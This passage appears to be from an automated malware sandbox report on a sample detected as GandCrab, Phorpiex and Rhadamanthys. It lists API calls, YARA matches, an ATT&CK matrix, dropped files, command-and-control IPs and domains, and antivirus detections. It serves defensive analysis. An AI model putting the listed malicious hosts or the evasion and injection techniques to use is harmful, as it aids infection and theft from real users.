                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeCode function: 3_2_00251A58 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_00251A58
                          Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: svchost.exe, 0000000A.00000002.1704642025.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OllyDbg.exe

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 0000000A.00000003.1606124598.00000000027F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.1704824267.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000003.1602277553.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000003.1606012463.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: Process Memory Space: 896429707.exe PID: 7668, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sysnldcvmr.exe PID: 7744, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sysnldcvmr.exe PID: 8000, type: MEMORYSTR
                          Source: Yara matchFile source: 0000000A.00000003.1606124598.00000000027F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.1704824267.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000003.1602277553.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000003.1606012463.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,4_2_00401470
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,4_2_00402020
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_0040D710 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,4_2_0040D710
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_004013B0 CreateEventA,socket,bind,CreateThread,4_2_004013B0
                          Source: C:\Windows\sysnldcvmr.exeCode function: 5_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,5_2_00401470
                          Source: C:\Windows\sysnldcvmr.exeCode function: 5_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,5_2_00402020
                          Source: C:\Windows\sysnldcvmr.exeCode function: 5_2_0040D710 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,5_2_0040D710
                          Source: C:\Windows\sysnldcvmr.exeCode function: 5_2_004013B0 CreateEventA,socket,bind,CreateThread,5_2_004013B0
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_00401470 CreateEventA,socket,htons,setsockopt,bind,CreateThread,7_2_00401470
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,7_2_00402020
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_0040D710 socket,htons,inet_addr,setsockopt,bind,lstrlenA,sendto,ioctlsocket,7_2_0040D710
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_004013B0 CreateEventA,socket,bind,CreateThread,7_2_004013B0
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                          Windows Management Instrumentation
                          11
                          DLL Side-Loading
                          1
                          Abuse Elevation Control Mechanism
                          1
                          Deobfuscate/Decode Files or Information
                          21
                          Input Capture
                          1
                          System Time Discovery
                          Remote Services1
                          Archive Collected Data
                          14
                          Ingress Tool Transfer
                          Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault Accounts13
                          Native API
                          1
                          Windows Service
                          11
                          DLL Side-Loading
                          1
                          Abuse Elevation Control Mechanism
                          LSASS Memory1
                          System Network Connections Discovery
                          Remote Desktop Protocol21
                          Input Capture
                          2
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts12
                          Command and Scripting Interpreter
                          1
                          Scheduled Task/Job
                          1
                          Windows Service
                          3
                          Obfuscated Files or Information
                          Security Account Manager2
                          File and Directory Discovery
                          SMB/Windows Admin Shares3
                          Clipboard Data
                          1
                          Non-Standard Port
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts1
                          Scheduled Task/Job
                          1
                          Registry Run Keys / Startup Folder
                          411
                          Process Injection
                          11
                          DLL Side-Loading
                          NTDS136
                          System Information Discovery
                          Distributed Component Object ModelInput Capture3
                          Non-Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud Accounts1
                          PowerShell
                          Network Logon Script1
                          Scheduled Task/Job
                          121
                          Masquerading
                          LSA Secrets561
                          Security Software Discovery
                          SSHKeylogging123
                          Application Layer Protocol
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                          Registry Run Keys / Startup Folder
                          141
                          Virtualization/Sandbox Evasion
                          Cached Domain Credentials1
                          Process Discovery
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items411
                          Process Injection
                          DCSync141
                          Virtualization/Sandbox Evasion
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          Hidden Files and Directories
                          Proc Filesystem1
                          Application Window Discovery
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1569290 Sample: f5TWdT5EAc.exe Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 109 twizt.net 2->109 111 www.geoplugin.net 2->111 113 2 other IPs or domains 2->113 145 Suricata IDS alerts for network traffic 2->145 147 Found malware configuration 2->147 149 Malicious sample detected (through community Yara rule) 2->149 151 17 other signatures 2->151 14 f5TWdT5EAc.exe 18 2->14         started        19 winupsecvmgr.exe 2->19         started        21 winupsecvmgr.exe 2->21         started        23 9 other processes 2->23 signatures3 process4 dnsIp5 129 twizthash.net 185.215.113.66, 49710, 49721, 49747 WHOLESALECONNECTIONSNL Portugal 14->129 101 C:\Users\user\AppData\Local\Temp\34D7.exe, PE32 14->101 dropped 103 C:\Users\user\AppData\Local\...\pei[1].exe, PE32 14->103 dropped 131 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->131 25 34D7.exe 16 14->25         started        105 C:\Users\user\AppData\Roaming\...\WR64.sys, PE32+ 19->105 dropped 107 C:\Users\user\AppData\...\jacrzswcvuml.tmp, PE32+ 19->107 dropped 133 Suspicious powershell command line found 19->133 135 Writes to foreign memory regions 19->135 137 Modifies the context of a thread in another process (thread injection) 19->137 143 2 other signatures 19->143 29 conhost.exe 19->29         started        31 dwm.exe 19->31         started        139 Found direct / indirect Syscall (likely to bypass EDR) 21->139 141 Loading BitLocker PowerShell Module 23->141 33 WerFault.exe 23->33         started        35 conhost.exe 23->35         started        37 WerFault.exe 23->37         started        39 5 other processes 23->39 file6 signatures7 process8 file9 87 C:\Users\user\AppData\Local\...\896429707.exe, PE32 25->87 dropped 89 C:\Users\user\AppData\Local\...\newtpp[1].exe, PE32 25->89 dropped 169 Multi AV Scanner detection for dropped file 25->169 171 Machine Learning detection for dropped file 25->171 173 Hides that the sample has been downloaded from the Internet (zone.identifier) 25->173 41 896429707.exe 1 1 25->41         started        175 Suspicious powershell command line found 29->175 177 Query firmware table information (likely to detect VMs) 31->177 signatures10 process11 file12 91 C:\Windows\sysnldcvmr.exe, PE32 41->91 dropped 179 Antivirus detection for dropped file 41->179 181 Multi AV Scanner detection for dropped file 41->181 183 Found evasive API chain (may stop execution after checking mutex) 41->183 185 5 other signatures 41->185 45 sysnldcvmr.exe 49 41->45         started        signatures13 process14 dnsIp15 123 198.163.204.6 WINDSTREAMUS United States 45->123 125 189.167.22.36 UninetSAdeCVMX Mexico 45->125 127 74 other IPs or domains 45->127 93 C:\Users\user\AppData\Local\...\78476062.exe, PE32 45->93 dropped 95 C:\Users\user\AppData\Local\...\640832494.exe, PE32 45->95 dropped 97 C:\Users\user\AppData\...\2910625892.exe, PE32 45->97 dropped 99 2 other malicious files 45->99 dropped 199 Multi AV Scanner detection for dropped file 45->199 201 Found evasive API chain (may stop execution after checking mutex) 45->201 203 Contains functionality to check if Internet connection is working 45->203 205 2 other signatures 45->205 50 1171111125.exe 15 45->50         started        54 78476062.exe 15 45->54         started        57 1657630034.exe 45->57         started        59 2 other processes 45->59 file16 signatures17 process18 dnsIp19 79 C:\Users\user\AppData\...\2779421088.exe, PE32 50->79 dropped 81 C:\Users\user\AppData\Local\...\rh[1].exe, PE32 50->81 dropped 153 Multi AV Scanner detection for dropped file 50->153 155 Hides that the sample has been downloaded from the Internet (zone.identifier) 50->155 61 2779421088.exe 1 50->61         started        117 185.215.113.84, 49793, 80 WHOLESALECONNECTIONSNL Portugal 54->117 83 C:\Users\user\AppData\...\2688734187.exe, PE32+ 54->83 dropped 85 C:\Users\user\AppData\Local\...\nxmr[1].exe, PE32+ 54->85 dropped 157 Antivirus detection for dropped file 54->157 159 Machine Learning detection for dropped file 54->159 64 2688734187.exe 54->64         started        119 91.202.233.141 M247GB Russian Federation 57->119 121 geoplugin.net 178.237.33.50 ATOM86-ASATOM86NL Netherlands 59->121 161 Found evasive API chain (may stop execution after checking mutex) 59->161 67 WerFault.exe 59->67         started        file20 signatures21 process22 file23 187 Antivirus detection for dropped file 61->187 189 Multi AV Scanner detection for dropped file 61->189 191 Machine Learning detection for dropped file 61->191 197 2 other signatures 61->197 69 svchost.exe 61->69         started        77 C:\Users\user\...\winupsecvmgr.exe, PE32+ 64->77 dropped 193 Suspicious powershell command line found 64->193 195 Found direct / indirect Syscall (likely to bypass EDR) 64->195 signatures24 process25 dnsIp26 115 92.255.85.66, 49792, 5188 SOVTEL-ASRU Russian Federation 69->115 163 System process connects to network (likely due to code injection or exploit) 69->163 165 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 69->165 167 Switches to a custom stack to bypass stack traces 69->167 73 fontdrvhost.exe 69->73         started        signatures27 process28 process29 75 WerFault.exe 73->75         started       

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          f5TWdT5EAc.exe61%ReversingLabsWin32.Ransomware.GandCrab
                          f5TWdT5EAc.exe100%AviraW32/Infector.Gen
                          f5TWdT5EAc.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\2688734187.exe100%AviraHEUR/AGEN.1329646
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nxmr[1].exe100%AviraHEUR/AGEN.1329646
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\newtpp[1].exe100%AviraHEUR/AGEN.1315882
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\rh[1].exe100%AviraHEUR/AGEN.1351777
                          C:\Users\user\AppData\Local\Temp\896429707.exe100%AviraHEUR/AGEN.1315882
                          C:\Users\user\AppData\Local\Temp\2779421088.exe100%AviraHEUR/AGEN.1351777
                          C:\Users\user\AppData\Local\Temp\78476062.exe100%AviraWORM/Phorpiex.olrti
                          C:\Users\user\AppData\Local\Temp\1657630034.exe100%AviraTR/Dropper.Gen
                          C:\Users\user\AppData\Local\Temp\2688734187.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nxmr[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\newtpp[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\rh[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\pei[1].exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\896429707.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\2779421088.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\78476062.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\34D7.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\rh[1].exe92%ReversingLabsWin32.Spyware.Rhadamanthys
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\newtpp[1].exe96%ReversingLabsWin32.Worm.Phorpiex
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\nxmr[1].exe76%ReversingLabsWin64.Trojan.Whisperer
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\pei[1].exe88%ReversingLabsWin32.Trojan.MintZard
                          C:\Users\user\AppData\Local\Temp\1171111125.exe75%ReversingLabsWin32.Worm.Phorpiex
                          C:\Users\user\AppData\Local\Temp\1657630034.exe79%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\Temp\2688734187.exe76%ReversingLabsWin64.Trojan.Whisperer
                          C:\Users\user\AppData\Local\Temp\2779421088.exe92%ReversingLabsWin32.Spyware.Rhadamanthys
                          C:\Users\user\AppData\Local\Temp\34D7.exe88%ReversingLabsWin32.Trojan.MintZard
                          C:\Users\user\AppData\Local\Temp\640832494.exe39%ReversingLabsWin32.Trojan.Generic
                          C:\Users\user\AppData\Local\Temp\78476062.exe91%ReversingLabsWin32.Worm.Phorpiex
                          C:\Users\user\AppData\Local\Temp\896429707.exe96%ReversingLabsWin32.Worm.Phorpiex
